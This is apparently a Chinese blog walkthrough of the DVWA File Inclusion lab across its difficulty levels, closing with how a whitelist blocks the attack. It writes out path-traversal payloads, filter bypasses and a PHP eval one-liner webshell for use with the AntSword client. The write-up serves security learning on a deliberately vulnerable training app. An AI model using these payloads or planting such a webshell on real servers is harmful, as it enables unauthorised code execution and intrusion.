dvwa4——File Inclusion

LOW:

先随便点开一个文件,可以观察到url栏变成这样,说明?page=是dvwa当前关卡用来加载文件的参数

复制代码
http://10.24.8.35/DVWA/vulnerabilities/fi/?page=file1.php

我们查看源码 ,没有什么过滤,直接尝试访问其他文件

在url栏的page处做一些修改,我们改动page后为如下代码

复制代码
?page=../../phpinfo.php

../(上级目录指示符号):

从内向外跳,先随便测试一个不存在的文件名,报错,但可以看出我们要查询的目标文件(phpinfo),在dvwa层的目录里,还有两层的距离,所以我们输入两个../


爆出信息

说明dvwa文件目录里的可以运行

我们在dvwa文件夹里新建一个测试文件testd1.exe

输入想要的内容然后ctrl-s保存 (这很重要(悲))

在 url 里写代码

ps!:服务器会把我们包含的任何文件作为php代码执行,如果包含有效的代码,执行并返回i结果,如果不是php代码,就直接回显文件内容

复制代码
?page=../../testd1.txt

回显成功

现在我们把文件后缀改成php,内容改成php一句话木马,打开中国蚁剑

复制代码
<?php @eval($_POST['password']);?>

MEDIUM:

观察源码:

发现这一关将http://,https://,../,..\ 全部替换为了空格

个人解决的一点疑问:这里的过滤仅仅针对page的参数,而不是应用于整个url

所以这一关我们把相对路径( ../ )换成绝对路径就行~

复制代码
http://10.24.15.188/DVWA/vulnerabilities/fi/?page=D:\nginx-1.27.5\html\DVWA\testd1.php

其余爆数据与low一样

HIGH:

查看源码:

用fnmatch函数检查page之后的文件名是否以file开头,或者文件名是否为include

所以我们把文件名改成filedi.php, 其余爆数据与low一样

IMPOSSIBLE:

分析源码:


白名单(whitelist):

与黑名单(Blacklist)相反

  • 黑名单:禁止已知的危险项,放行其他内容(如:过滤 ../ )。

  • 白名单:只允许已知的安全项,拒绝其他所有内容(如:只允许 incude.php)。


所以无论怎么构造,都只能包含这四个文件,无解

❀❀❀ 完结撒花!!!❀❀❀

相关推荐
我不是QI17 小时前
DES 加密算法:核心组件、加解密流程与安全特性
经验分享·算法·安全·网络安全·密码学
搞科研的小刘选手20 小时前
【通信&网络安全主题】第六届计算机通信与网络安全国际学术会议(CCNS 2025)
大数据·人工智能·网络安全·vr·通信工程·网络技术·计算机工程
Che_Che_1 天前
论文阅读-IDFUZZ: Intelligent Directed Grey-box Fuzzing
论文阅读·网络安全·模糊测试·定向模糊测试
介一安全1 天前
【Frida Android】基础篇8:Java层Hook基础——调用带对象参数的方法
android·网络安全·逆向·安全性测试·frida
emma羊羊1 天前
【SSRF漏洞】Server-Side Request Forgery 服务器端请求伪造
网络安全·pikachu·ssrf
介一安全1 天前
【Frida Android】基础篇4:Java层Hook基础——调用静态方法
android·网络安全·逆向·安全性测试·frida
火白学安全1 天前
《Python红队攻防脚本零基础编写:入门篇(一)》
python·安全·web安全·网络安全·系统安全
介一安全2 天前
【Frida Android】基础篇6:Java层Hook基础——创建类实例、方法重载、搜索运行时实例
android·java·网络安全·逆向·安全性测试·frida
xixixi777772 天前
云计算平台的技术安全需求主要分为“端-管-云”三个部分
网络安全·云端·管道·终端安全·客户端安全
贝塔实验室2 天前
QPSK信号载波同步技术---极性Costas 法载波同步
计算机网络·算法·网络安全·数学建模·信息与通信·信号处理·傅立叶分析